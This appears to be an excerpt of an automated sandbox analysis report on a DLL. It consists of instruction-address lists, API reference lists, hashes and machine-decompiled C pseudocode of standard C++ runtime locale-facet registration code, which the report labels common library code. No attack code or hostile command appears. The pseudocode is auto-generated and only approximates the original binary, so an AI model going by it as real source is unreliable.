                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F6BA
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F6C4
                          • int.LIBCPMT ref: 6E20F6DB
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F6FE
                          • std::_Facet_Register.LIBCPMT ref: 6E20F715
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F735
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F753
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID: |m,n
                          • API String ID: 113178234-3550068666
                          • Opcode ID: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
                          • Instruction ID: fd568e27bc1ff9b3a391e1cd033205c842be542f981569738765c01386a0c0e3
                          • Opcode Fuzzy Hash: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
                          • Instruction Fuzzy Hash: F311CA7595051D9FCF01DBD4C894AEEB77BBF44714F240908E4106B2D0DB749A85C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t418 - 0x14, 0);
				_t399 =  *0x6e2c6dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6E1E161C(0x6e2c6d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6E2066BA(_t418 - 0x14);
					return E6E220075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6E2112B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t418 - 0x20);
							E6E223D74(_t418 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t389, _t399, 0x14);
							E6E206653(_t418 - 0x14, 0);
							_t400 =  *0x6e2c6dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6E1E161C(0x6e2c6d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6E2066BA(_t418 - 0x14);
								return E6E220075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6E211339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t418 - 0x20);
										E6E223D74(_t418 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t296, _t390, _t400, 0x14);
										E6E206653(_t418 - 0x14, 0);
										_t401 =  *0x6e2c6db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6E1E161C(0x6e2c6d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6E2066BA(_t418 - 0x14);
											return E6E220075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6E2113A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t418 - 0x20);
													E6E223D74(_t418 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t296, _t391, _t401, 0x14);
													E6E206653(_t418 - 0x14, 0);
													_t402 =  *0x6e2c6ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6E1E161C(0x6e2c6d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6E2066BA(_t418 - 0x14);
														return E6E220075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6E211409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t418 - 0x20);
																E6E223D74(_t418 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t296, _t392, _t402, 0x14);
																E6E206653(_t418 - 0x14, 0);
																_t403 =  *0x6e2c6de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6E1E161C(0x6e2c6d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6E2066BA(_t418 - 0x14);
																	return E6E220075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6E211471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t418 - 0x20);
																			E6E223D74(_t418 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t296, _t393, _t403, 0x14);
																			E6E206653(_t418 - 0x14, 0);
																			_t404 =  *0x6e2c6dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6E1E161C(0x6e2c6da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6E2066BA(_t418 - 0x14);
																				return E6E220075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6E2114EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t418 - 0x20);
																						E6E223D74(_t418 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t296, _t394, _t404, 0x14);
																						E6E206653(_t418 - 0x14, 0);
																						_t405 =  *0x6e2c6dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6E1E161C(0x6e2c6d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6E2066BA(_t418 - 0x14);
																							return E6E220075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6E211558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t418 - 0x20);
																									E6E223D74(_t418 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t296, _t395, _t405, 0x14);
																									E6E206653(_t418 - 0x14, 0);
																									_t406 =  *0x6e2c6e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6E1E161C(0x6e2c6dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6E2066BA(_t418 - 0x14);
																										return E6E220075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6E2115C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t418 - 0x20);
																												E6E223D74(_t418 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t296, _t396, _t406, 0x14);
																												E6E206653(_t418 - 0x14, 0);
																												_t407 =  *0x6e2c6dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6E1E161C(0x6e2c6d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6E2066BA(_t418 - 0x14);
																													return E6E220075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6E21162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6E1E1438(_t359);
																															E6E223D74(_t418 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e26851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6e26c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6E21542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6E220075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6E206FD3(__eflags, _t397);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6e2c6dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6E206FD3(__eflags, _t396);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6e2c6e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6E206FD3(__eflags, _t395);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6e2c6dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6E206FD3(__eflags, _t394);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6e2c6dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6E206FD3(__eflags, _t393);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6e2c6de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6E206FD3(__eflags, _t392);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6e2c6ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6E206FD3(__eflags, _t391);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6e2c6db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6E206FD3(__eflags, _t390);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6e2c6dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6E206FD3(__eflags, _t389);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6e2c6dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

































                          0x6e20f759
                          0x6e20f759
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78a
                          0x6e20f78f
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F760
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F76A
